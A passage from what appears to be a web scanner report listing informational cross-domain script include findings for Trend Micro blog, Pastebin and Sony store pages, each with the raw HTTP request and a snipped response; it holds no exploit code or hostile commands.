GET /category/exploits/ HTTP/1.1 Host: blog.trendmicro.com Proxy-Connection: keep-alive Referer: http://blog.trendmicro.com/a-snapshot-of-android-threats-infographic/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.2.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=2; bn_u=6923713914570485926; cmRS=&t1=1315350998493&t2=1315351000572&t3=1315351002621&t4=1315350994638<i=1315351002613&ln=&hr=/category/exploits/&fti=&fn=UNDEFINED%3A0%3BUNDEFINED%3A1%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/a-snapshot-of-android-threats-infographic/&rf=http%3A//blog.trendmicro.com/%3Fp%3D12640; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fa-snapshot-of-android-threats-infographic%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22t%22%3A1315351002628%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fexploits%2F%22%2C%22l%22%3A%22Exploits%22%2C%22de%22%3A%7B%22su%22%3A%22In%20January%20this%20year%2C%20Trend%20Micro%20chairman%20and%20co-founder%20Steve%20Chang%20was%20quoted%20as%20saying%20that%20Android-based%20devices%20are%20less%20secure%20than%20those%20running%20on%20iOS.%22%2C%22ti%22%3A%22A%20Snapshot%20of%20Android%20Threats%20%5BINFOGRAPHIC%5D%20%7C%20Malware%20Blog%20%7C%20Trend%20Micro%22%2C%22nw%22%3A813%2C%22nl%22%3A120%7D%7D
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Content-Type: text/html; charset=UTF-8 Pragma: no-cache X-Pingback: http://blog.trendmicro.com/xmlrpc.php test : test X-Mobilized-By: WordPress Mobile Pack 1.2.4 X-Varnish: 1696291820 Content-Length: 61429 Vary: Accept-Encoding Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Tue, 06 Sep 2011 18:16:40 GMT Date: Tue, 06 Sep 2011 18:16:40 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profile="http:...[SNIP]... </script><script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'> </script>...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </div>--><script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... </script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]... </script><script src='//libs.coremetrics.com/eluminate.js'> </script>...[SNIP]...
13.5. http://blog.trendmicro.com/category/pharming/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/category/pharming/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1 http://edge.quantserve.com/quant.js http://libs.coremetrics.com/eluminate.js http://platform.twitter.com/widgets.js http://widgets.twimg.com/j/2/widget.js
Request
GET /category/pharming/ HTTP/1.1 Host: blog.trendmicro.com Proxy-Connection: keep-alive Referer: http://blog.trendmicro.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.8.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=8; bn_u=6923713914570485926; cmRS=&t1=1315351074117&t2=1315351076030&t3=1315351267076&t4=1315351071147<i=1315351267076&ln=&hr=/category/pharming/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/&rf=http%3A//blog.trendmicro.com/trend-micro-researchers-identify-vulnerability-in-hotmail/; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Content-Type: text/html; charset=UTF-8 Pragma: no-cache X-Pingback: http://blog.trendmicro.com/xmlrpc.php test : test X-Mobilized-By: WordPress Mobile Pack 1.2.4 X-Varnish: 1696295149 Content-Length: 61490 Vary: Accept-Encoding Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Tue, 06 Sep 2011 18:21:03 GMT Date: Tue, 06 Sep 2011 18:21:03 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profile="http:...[SNIP]... </script><script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'> </script>...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </div>--><script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... </script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]... </script><script src='//libs.coremetrics.com/eluminate.js'> </script>...[SNIP]...
13.6. http://blog.trendmicro.com/trend-micro-researchers-identify-vulnerability-in-hotmail/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/trend-micro-researchers-identify-vulnerability-in-hotmail/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1 http://edge.quantserve.com/quant.js http://libs.coremetrics.com/eluminate.js http://platform.twitter.com/widgets.js http://static.ak.fbcdn.net/connect.php/js/FB.Share http://widgets.twimg.com/j/2/widget.js
Request
GET /trend-micro-researchers-identify-vulnerability-in-hotmail/ HTTP/1.1 Host: blog.trendmicro.com Proxy-Connection: keep-alive Referer: http://blog.trendmicro.com/category/exploits/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.6.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=6; bn_u=6923713914570485926; cmRS=&t1=1315351031684&t2=1315351033496&t3=1315351039900&t4=1315351030127<i=1315351039899&ln=&hr=/trend-micro-researchers-identify-vulnerability-in-hotmail/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/category/exploits/&rf=http%3A//blog.trendmicro.com/blackhat-2011-dangers-of-embedded-web-servers/; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fexploits%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fblackhat-2011-dangers-of-embedded-web-servers%2F%22%2C%22t%22%3A1315351039907%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22de%22%3A%7B%22ti%22%3A%22Exploits%20%7C%20TrendLabs%20%7C%20Malware%20Blog%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A910%2C%22nl%22%3A117%7D%7D
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Content-Type: text/html; charset=UTF-8 Pragma: no-cache X-Pingback: http://blog.trendmicro.com/xmlrpc.php test : test X-Mobilized-By: WordPress Mobile Pack 1.2.4 Link: <http://blog.trendmicro.com/34090>; rel=shortlink Link: <http://blog.trendmicro.com/?p=34090>; rel=shortlink X-Varnish: 1696292645 Content-Length: 59377 Vary: Accept-Encoding Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Tue, 06 Sep 2011 18:17:17 GMT Date: Tue, 06 Sep 2011 18:17:17 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profile="http:...[SNIP]... </script><script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'> </script>...[SNIP]... </div> <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"> </script>...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </div>--><script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... </script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]... </script><script src='//libs.coremetrics.com/eluminate.js'> </script>...[SNIP]...
13.7. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/wp-content/plugins/flash-gallery/js/addOnLoad.js
Issue detail
The response dynamically includes the following script from another domain:
Request
GET /wp-content/plugins/flash-gallery/js/addOnLoad.js?ver=1 HTTP/1.1 Host: blog.trendmicro.com Proxy-Connection: keep-alive Referer: http://blog.trendmicro.com/?p=12640 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Thu, 02 Dec 2010 03:50:59 GMT ETag: "18c4d1-2c1-49665546aeec0" Accept-Ranges: bytes Content-Length: 705 Content-Type: application/x-javascript Date: Tue, 06 Sep 2011 18:16:27 GMT Connection: close /*http://core.trac.wordpress.org/changeset/6482*/ if(typeof addLoadEvent !== 'function'){addLoadEvent=(function(){var e=[],t,s,n,i,o,d=document,w=window,r='readyState',c='onreadystatechange',x=functi...[SNIP]... 1;clearInterval(t);while(i=e.shift())i();if(s)s[c]=''};return function(f){if(n)return f();if(!e[0]){d.addEventListener&&d.addEventListener("DOMContentLoaded",x,false);/*@cc_on@*//*@if(@_win32)d.write("<script id=__ie_onload defer src=//0> <\/scr"+"ipt>...[SNIP]...
13.8. http://pastebin.com/bq8xJPMn
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pastebin.com
Path:
/bq8xJPMn
Issue detail
The response dynamically includes the following scripts from other domains:http://edge.quantserve.com/quant.js http://lolbin.net/stats.php http://platform.twitter.com/widgets.js http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js
Request
GET /bq8xJPMn HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:35 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 04-Oct-2011 18:10:35 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 373099 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <link href="/i/style.css?12" rel="stylesheet" type="text/css" /> <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]... <!-- End comScore Tag --> <script type="text/javascript" src="http://lolbin.net/stats.php"> </script>...[SNIP]...
13.9. http://pastebin.com/etc/ads/iframes/160x600.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/160x600.html
Issue detail
The response dynamically includes the following script from another domain:http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js
Request
GET /etc/ads/iframes/160x600.html HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:35 GMT Content-Type: text/html Last-Modified: Sat, 02 Jul 2011 13:17:48 GMT Connection: keep-alive Vary: Accept-Encoding Content-Length: 650 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-eq...[SNIP]... </script> <script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js"> </script>...[SNIP]...
13.10. http://pastebin.com/etc/ads/iframes/728x90.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/728x90.html
Issue detail
The response dynamically includes the following script from another domain:http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js
Request
GET /etc/ads/iframes/728x90.html HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:35 GMT Content-Type: text/html Last-Modified: Sat, 02 Jul 2011 13:17:34 GMT Connection: keep-alive Vary: Accept-Encoding Content-Length: 658 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi...[SNIP]... </script> <script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js"> </script>...[SNIP]...
13.11. http://pastebin.com/etc/social/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/social/index.html
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js https://apis.google.com/js/plusone.js
Request
GET /etc/social/index.html HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:35 GMT Content-Type: text/html Last-Modified: Mon, 05 Sep 2011 09:11:33 GMT Connection: keep-alive Vary: Accept-Encoding Content-Length: 923 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-eq...[SNIP]... </title> <script type="text/javascript" src="https://apis.google.com/js/plusone.js"> </script> <script src="http://connect.facebook.net/en_US/all.js#appId=150549571626327&xfbml=1"> </script>...[SNIP]...
13.12. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/CategoryDisplay
Issue detail
The response dynamically includes the following script from another domain:http://nexus2.ensighten.com/sony/Bootstrap.js
Request
GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167 HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://www.sony.com/SonySearch/Search?action=search&ti=0&pst=&pti=&first=1&st=xss+playstation User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s; sifrFetch=true; s_visit=1; s_sq=%5B%5BB%5D%5D; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.1.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; mbox=check#true#1315352981|session#1315352920400-736912#1315354781|PC#1315334914578-928682.19#1316562527; s_cc=true
Response
HTTP/1.1 200 OK ntCoent-Length: 4923 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 4923 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:49:35 GMT Connection: close Cache-Control: private Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-Com...[SNIP]... <!-- AllSitesHeadInclude --><script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js"> </script>...[SNIP]...
13.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The response dynamically includes the following script from another domain:http://nexus2.ensighten.com/sony/Bootstrap.js
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; 